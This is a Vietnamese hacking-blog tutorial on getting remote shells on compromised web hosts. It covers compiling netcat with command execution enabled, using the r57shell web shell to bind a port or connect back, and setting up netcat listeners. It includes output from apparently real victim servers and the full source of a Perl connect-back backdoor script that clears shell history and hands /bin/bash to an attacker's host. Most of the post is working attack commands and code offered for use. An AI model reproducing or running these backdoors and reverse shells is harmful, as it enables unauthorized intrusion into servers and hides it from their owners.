Thứ Bảy, 7 tháng 7, 2012

How 2 use back-connect, bind port

By Mr. Evolution aka dondoc @ vnISS+ 


Trước tiên muốn làm những việc trên thì bạn cần phải có những thứ sau đây :


1) Netcat for Win32 & *NIX , PuTTy :


2) Máy tính nối mạng riêng tại nhà hoặc 1 hosting hỗ trợ SSH. (ở đây ĐĐ xài hosting) 
3) Một con r57shell hoặc script connect-back bất kì :


4) Kiến thức Windows và *NIX.


-----------------------------------------------------------------------------------------------------


Start :


- Install netcat trên hosting :


- Mở file netcat.c chỉnh một số thứ sau :
+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu / : // res_init(); 
+ thêm 2 dòng sau vào phần #define (nằm ở đầu file): 
#define GAPING_SECURITY_HOLE
#define TELNET 
- Up lên host
- Dùng PuTTy kết nối đến = SSH
- biên dịch: make linux
- chmod nc 755
- chạy thử: ./nc -h
Nếu hiện ra như sau là được :







- Bind Port :


Cái này trong con r57shell đã hỗ trợ sẵn , cách làm tương đối đơn giản 
Kéo xuống cuối con r57 phần : Bind port to /bin/bash , trong đó :


Port : bất kỳ port nào bạn thích , ví dụ : 2121
Password for access : pass để quyền truy cập (để mặc định là r57)
Use : để là Perl


Xong rồi bạn nhấn Bind , sau đó trên máy tính của mình bạn mở Netcat ra và kết nối đến victim như sau :
Cú pháp :


Quote:
C:\netcat>nc -nvv [ip của victim] 2121
-nvv : dùng ip dạng số và hiển thị thông tin chi tiết về kết nối hiện tại
Ví dụ :


Quote:
C:\netcat>nc -nvv 66.246.215.103 2121
Nếu ok thì ta sẽ nhận được shell lệnh.
Lưu ý : Nếu victim có đặt firewall thì cách này ko có tác dụng , chuyển sang xài back-connect .




- Back-connect :


Cách 1 : 


Vào phần back-connect của con r57 :
IP : địa chỉ IP của host install netcat ví dụ 216.120.237.150
Port: bất kì ví dụ 3131
Use : để mặc định Perl
Dùng PuTTy kết nối đến host = SSH , di chuyển đến thư mục chứa con netcat vừa biên dịch :
Chạy lệnh sau :
Quote:
bash-2.05a$ ./nc -l -n -v -p 3131 
Quay sang con r57 nhấn Connect , nếu ok thì trên cửa sổ PuTTy sẽ được như sau :


Code:
listening on [any] 3131 ...
connect to [216.120.237.150] from (UNKNOWN) [216.118.97.168] 56973
Linux peony.multisite.site5.com 2.6.9-22.0.2.ELsmp #1 SMP Tue Jan 17 07:10:04 CST 2006 i686 i686 i386 GNU/Linux
uid=32466(ruth) gid=969(ruth) groups=969(ruth) 

xong !




Cách 2 : 


Upload file dc.pl ở trên lên host
Dùng con r57 run command như sau :
Cú pháp : 


Quote:
perl dc.pl [ip] [port]
Ví dụ :


Quote:
perl dc.pl 216.120.237.150 4141
Cửa sổ PuTTy để netcat lắng nghe tại cổng 4141 , nếu ko có gì trở ngại thì ta sẽ được shell lệnh như sau : 


Code:
listening on [any] 4141 ...
connect to [216.120.237.150] from (UNKNOWN) [216.118.97.168] 57421
--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--


--==Systeminfo==--
Linux peony.multisite.site5.com 2.6.9-22.0.2.ELsmp #1 SMP Tue Jan 17 07:10:04 CST 2006 i686 i686 i386 GNU/Linux


--==Userinfo==--
uid=32466(ruth) gid=969(ruth) groups=969(ruth)


--==Directory==--
/home/ruth/public_html/uploads/test


--==Shell==--
id
uid=32466(ruth) gid=969(ruth) groups=969(ruth) 







PHP Code:
#!/usr/bin/perluse IO::Socket;#   Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell      
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90                                        
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#$system   = '/bin/bash';$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";SOCKET->autoflush();open(STDIN, ">&SOCKET");open(STDOUT,">&SOCKET");open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR  \n\n";system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");system($system);#EOF 

Không có nhận xét nào: